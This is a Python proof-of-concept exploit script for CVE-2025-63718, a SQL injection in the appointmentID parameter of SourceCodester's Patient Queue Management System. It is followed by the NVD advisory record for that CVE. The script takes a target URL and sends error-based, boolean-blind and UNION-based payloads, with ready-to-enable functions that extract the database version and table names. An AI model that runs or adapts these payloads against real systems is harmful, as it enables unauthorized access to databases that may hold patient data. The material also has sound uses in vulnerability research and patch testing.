CVE-2025-63718

import requests import sys # CVE-2025-63718 PoC - SourceCodester PQMS SQL Injection # Target: api_patient_schedule.php endpoint # Parameter: appointmentID def exploit_sqli(url, payload): """Send SQL injection payload to vulnerable endpoint""" target_url = f"{url}/api_patient_schedule.php" params = {"appointmentID": payload} try: response = requests.get(target_url, params=params, timeout=10) return response.text except requests.exceptions.RequestException as e: return f"Error: {e}" def test_basic_injection(url): """Test basic SQL injection - error-based""" # Basic payload to trigger SQL error payload = "1'" print(f"[*] Testing basic injection with payload: {payload}") result = exploit_sqli(url, payload) print(f"[+] Response: {result[:200]}") def extract_database_version(url): """Extract database version using UNION injection""" # UNION-based injection to get database version payload = "1' UNION SELECT NULL,@@version,NULL-- -" print(f"[*] Extracting database version...") result = exploit_sqli(url, payload) print(f"[+] Database info: {result}") def extract_tables(url): """Extract table names from database""" payload = "1' UNION SELECT NULL,table_name,NULL FROM information_schema.tables WHERE table_schema=database()-- -" print(f"[*] Extracting table names...") result = exploit_sqli(url, payload) print(f"[+] Tables found: {result}") def blind_boolean_injection(url): """Test blind boolean-based SQL injection""" # Test if '1'='1' is true (always) true_payload = "1' AND '1'='1" false_payload = "1' AND '1'='2" print(f"[*] Testing boolean-based blind injection...") true_result = exploit_sqli(url, true_payload) false_result = exploit_sqli(url, false_payload) if len(true_result) != len(false_result): print("[+] Blind SQL injection confirmed!") else: print("[-] No difference detected") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-63718.py <target_url>") print("Example: python cve-2025-63718.py http://localhost/pqms") sys.exit(1) target = sys.argv[1].rstrip('/') print(f"[*] Target: {target}") print(f"[*] CVE-2025-63718 SQL Injection PoC") print("=" * 50) test_basic_injection(target) blind_boolean_injection(target) # Uncomment to extract actual data # extract_database_version(target) # extract_tables(target)

{"cve": {"id": "CVE-2025-63718", "sourceIdentifier": "[email protected]", "published": "2025-11-07T18:15:36.780", "lastModified": "2025-11-17T18:38:45.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL injection vulnerability exists in the SourceCodester PQMS (Patient Queue Management System) 1.0 in the api_patient_schedule.php endpoint. The appointmentID parameter is not properly sanitized, allowing attackers to execute arbitrary SQL commands."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pamzey:patients_waiting_area_queue_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "69FC38AE-BCD1-4A41-B2E0-CE3DEE703691"}]}]}], "references": [{"url": "https://github.com/floccocam-cpu/CVE-Research-2025/blob/main/CVE-2025-63718/README8.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/php/18348/patients-waiting-area-queue-management-system.html", "source": "[email protected]", "tags": ["Product"]}]}}